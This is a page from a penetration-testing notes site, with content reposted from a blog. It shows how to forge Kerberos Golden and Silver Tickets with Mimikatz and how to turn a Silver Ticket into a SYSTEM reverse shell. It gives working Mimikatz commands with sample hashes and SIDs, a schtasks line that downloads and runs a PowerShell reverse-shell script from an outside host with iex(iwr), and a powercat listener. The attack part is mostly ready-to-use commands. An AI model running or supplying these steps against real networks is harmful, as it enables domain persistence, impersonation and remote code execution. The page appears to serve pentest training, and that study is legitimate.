Defender's Notes
  • Welcome!
  • Methodology
  • Ethical Hacking
  • Resources/Blogs/Conferences/Labs
  • Writing Vulnerability Reports
  • Linux Tips
  • Certifications
  • Bug Bounty
    • Hints
  • Python
  • PenTesting
    • Recon
    • Network Scanning
    • Reverse Shell Payloads
    • API Security Testing
    • 53 - DNS
    • 21 - ftp
    • 139,445 - SMB
    • 111,2049 - rcpbind
    • Authentication
    • Scripting
    • OSINT
    • Cloud Security
    • Reverse Engineering
    • Password
    • Proxy Chain
    • Steganography
    • Buffer Overflow
  • Windows
    • Recon
    • Golden/Silver Ticket
    • PowerShell for Beginners
    • Windows Priv Escalate
      • Icecast (RPC)
    • Kerberos Attack
  • Web Pentesting
    • 80,443,8080 - Recon
    • Resources
      • Burp Suite
    • Web Vulnerabilities
      • WordPress
      • CSP Bypass
      • JSON Web Tokens
      • Insecure Desensitization
      • Open Redirect
      • Command Injection
      • Path Traversals
      • SSRF
      • SQL Injection
      • IDOR
      • Shellshock
      • Heartbleed
      • Session Attacks/Bypass
      • XSS
      • XXE
      • CSRF
      • File Inclusion (Local/Remote)
      • Drupal
    • OWASP Top 10 2017
      • Top 1: Injection
      • Top 2: Broken Authentication
      • Top 3: Sensitive Data Exposure
      • Top 4: XML External Entities (XXE)
      • Top 5: Broken Access Control
      • Top 6: Security Misconfiguration
      • Top 7: Cross-Site Scripting (XSS)
      • Top 8: Insecure Deserialization
      • Top 9: Using Components with Known Vulnerabilities
      • Top 10: Insufficient Logging & Monitoring
    • OOB
    • Java
    • Python Web Security
  • Linux
    • Upgrading shell
    • Linux Priv Escalate
      • Path Variable Manipulation
      • Systemctl
  • Binary Security
    • AOT
  • Hardware Security
    • Wi-fi
    • Radio
  • Mobile Security
    • Android
    • SMS
  • Videos
    • IppSec Videos
    • The Cyber Mentor
Powered by GitBook
On this page
  • Golden/Silver Ticket without Metasploit
  • Golden Ticket
  • Silver Ticket
  • Getting Reverse Shell

Was this helpful?

  1. Windows

Golden/Silver Ticket

PreviousReconNextPowerShell for Beginners

Last updated 4 years ago

Was this helpful?

Post taken from

Golden/Silver Ticket without Metasploit

Golden Ticket

Golden Ticket is a persistence mechanism, it is signed and encrypted with NTLM hash of krbtgt account. In simple words, Golden Ticket is a valid Ticket Granting Ticket(TGT) used to obtain access to different services. We can use the Golden Ticket to impersonate any user in the domain.

Once you get the NTLM hash of krbtgt account we can use the following Mimikatz command to get a Golden Ticket (We need to run this as a local admin as we will be writing to LSASS process):

Invoke-Mimikatz -Command ‘“kerberos::golden /User:Administrator /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt”’

kerberos::golden — Name of the Mimikatz Module

user — Name of the user for whom we are requesting the TGT (doesn’t need to be a valid name as account validation is not done by the DC until TGT is older than 20 mins)

domain — Name of the target domain

sid — Domain SID (You can use the command Get-DomainSID from PowerView to get this)

krbtgt — NTLM hash of the krbtgt account

id & group —User and Group RID(Optional parameter)

ptt — Inject the ticket into current PowerShell Session (we can use /ticket to save the ticket for later use)

startoffset — When will the ticket be available in minutes(0- right now)(Optional parameter)

endin — Lifetime of ticket in minutes(Optional parameter)

renewmax — Ticket lifetime with renewal in minutes (Optional parameter)

To check if the ticket was created, we can use the following command:

klist

Silver Ticket

A Silver Ticket on the other hand is a valid Ticket Granting Service(TGS) which is encrypted using the NTLM hash of a service account. Silver Ticket can only be used to access the service with who’s NTLM hash it is encrypted with. Silver Ticket attack is very quite in terms of the logs left behind but at the same time provides limited access.

Once we have the NTLM hash of a target service we can use the following command to request for Silver Ticket:

Invoke-Mimikatz -Command ‘“kerberos::golden /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /target:dc.somedomainname.local /service:HOST /rc4:731a06658bc10b59d71f5776e93e5689 /user:Administrator /ptt”’

The Mimikatz module used here is still kerberos::golden, there is no silver module.

service — the SPN name of service for which we are requesting TGS

rc4 — NTLM hash of target service account

Note: We need a TGS for HOST service in order to schedule task on the target server(required to a get reverse shell from Silver Ticket).

Getting Reverse Shell

Step 1: Schedule a weekly task to fetch reverse shell script.

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU “NT Authority\SYSTEM” /TN “ABC” /TR “powershell.exe -c ‘ iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)’”

Note: Make sure you are calling the function within the script and have proper IP and port number configured (Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.14 -Port 1024). And the file is host :P

S — Name of the computer on which the task is to be scheduled

SC — Schedule type

RU — User used to create and execute the task

TN — Name of the task

TR — specify the command to run when the task is running

Step 2: Start a listener

powercat -l -p 443 -v -t 1000

p — port to listen on

t — timeout

Step 3: Run the scheduled task.

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN “User14”

Reference:

schtasks -

https://medium.com/@mohnishdhage/how-to-get-a-reverse-shell-from-golden-silver-ticket-without-metasploit-52a9fc279e32
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
Generating Golden Ticket Using Mimikatz
Generating Silver Ticket Using Mimikatz
Scheduling a task using schtasks
Starting Powercat Listener
Running Scheduled Task